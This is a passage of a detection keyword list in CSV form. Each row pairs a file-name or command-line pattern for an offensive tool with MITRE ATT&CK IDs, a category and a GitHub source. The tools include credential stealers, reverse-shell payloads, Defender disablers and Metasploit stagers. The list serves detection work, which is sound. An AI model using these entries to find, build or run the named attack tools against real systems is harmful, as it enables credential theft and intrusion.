*.txt*",".{0,1000}wifite\s\-\-dict\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wifite -e *",".{0,1000}wifite\s\-e\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite --kill*",".{0,1000}wifite\s\-\-kill.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wifite --wep *",".{0,1000}wifite\s\-\-wep\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*Wifite.py*",".{0,1000}Wifite\.py.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite2.git*",".{0,1000}wifite2\.git.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*willfindlay/bpf-keylogger*",".{0,1000}willfindlay\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/willfindlay/bpf-keylogger","1","1","N/A","10","1","0","2","2020-01-13T20:17:02Z","2019-12-25T16:27:28Z" "*win_chrome_password_extractor.py*",".{0,1000}win_chrome_password_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_fake_malware.*",".{0,1000}win_fake_malware\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*win_keylogger.py*",".{0,1000}win_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_rev_http.exe*",".{0,1000}win_rev_http\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_rev_https.exe*",".{0,1000}win_rev_https\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_rev_tcp.exe*",".{0,1000}win_rev_tcp\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*win_wlan_passwd_and_wanip_extractor.py*",".{0,1000}win_wlan_passwd_and_wanip_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Win32.LaZagne*",".{0,1000}Win32\.LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*'Win32_Backdoor'*",".{0,1000}\'Win32_Backdoor\'.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*win32_stage_boot_reverse_shell_revert.asm*",".{0,1000}win32_stage_boot_reverse_shell_revert\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*win32_stage_uploadexec.asm*",".{0,1000}win32_stage_uploadexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*win32_stage_winexec.asm*",".{0,1000}win32_stage_winexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win32kLeaker.*",".{0,1000}Win32kLeaker\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win64.Lazagne*",".{0,1000}Win64\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Win7Elevate.*",".{0,1000}Win7Elevate\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Win7ElevateDll.*",".{0,1000}Win7ElevateDll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*WINAPI KaynLoader(*",".{0,1000}WINAPI\sKaynLoader\(.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*WinBruteLogon* -v -u*",".{0,1000}WinBruteLogon.{0,1000}\s\-v\s\-u.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.dpr*",".{0,1000}WinBruteLogon\.dpr.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.dproj*",".{0,1000}WinBruteLogon\.dproj.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WinBruteLogon.exe*",".{0,1000}WinBruteLogon\.exe.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinBruteLogon.res*",".{0,1000}WinBruteLogon\.res.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*WinCreds.exe*",".{0,1000}WinCreds\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*windapsearch --dc *",".{0,1000}windapsearch\s\-\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*windapsearch.py*",".{0,1000}windapsearch\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch_enum*",".{0,1000}windapsearch_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*windapsearch_py2.py*",".{0,1000}windapsearch_py2\.py.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch-master*",".{0,1000}windapsearch\-master.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*WinDefenderKiller*",".{0,1000}WinDefenderKiller.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*winDefKiller.exe*",".{0,1000}winDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*WindfarmDynamite.cdproj*",".{0,1000}WindfarmDynamite\.cdproj.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*WindfarmDynamite.exe*",".{0,1000}WindfarmDynamite\.exe.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*WindfarmDynamite.sln*",".{0,1000}WindfarmDynamite\.sln.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Windows Bind TCP ShellCode - BOF*",".{0,1000}Windows\sBind\sTCP\sShellCode\s\-\sBOF.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*'Windows Defender has blocked some of our Features.Please Turn off Windows Defender and run again*",".{0,1000}\'Windows\sDefender\shas\sblocked\ssome\sof\sour\sFeatures\.Please\sTurn\soff\sWindows\sDefender\sand\srun\sagain.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Windows Exploit*",".{0,1000}Windows\sExploit.{0,1000}","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*windows go build -o proxy.exe cmd/proxy/main.go*",".{0,1000}windows\sgo\sbuild\s\-o\sproxy\.exe\scmd\/proxy\/main\.go.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*-WindowS Hidden -ep Bypass -enc $b64FileServerMonitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64FileServerMonitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*-WindowS Hidden -ep Bypass -enc $b64monitoringScript*",".{0,1000}\-WindowS\sHidden\s\-ep\sBypass\s\-enc\s\$b64monitoringScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Windows Meterpreter Staged Reverse TCP (x64*",".{0,1000}Windows\sMeterpreter\sStaged\sReverse\sTCP\s\(x64.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Meterpreter Stageless Reverse TCP (x64)*",".{0,1000}Windows\sMeterpreter\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Staged JSP Reverse TCP*",".{0,1000}Windows\sStaged\sJSP\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Staged Reverse TCP (x64)*",".{0,1000}Windows\sStaged\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Windows Stageless Reverse TCP (x64)*",".{0,1000}Windows\sStageless\sReverse\sTCP\s\(x64\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*windows*lsa_secrets.py*",".{0,1000}windows.{0,1000}lsa_secrets\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*windows/c_payload_util*",".{0,1000}windows\/c_payload_util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows/gather/cachedump*",".{0,1000}windows\/gather\/cachedump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*windows/gather/hashdump*",".{0,1000}windows\/gather\/hashdump.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*Windows/lazagne.spec*",".{0,1000}Windows\/lazagne\.spec.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*windows/meterpreter/reverse_https*",".{0,1000}windows\/meterpreter\/reverse_https.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*windows/samdump.go*",".{0,1000}windows\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 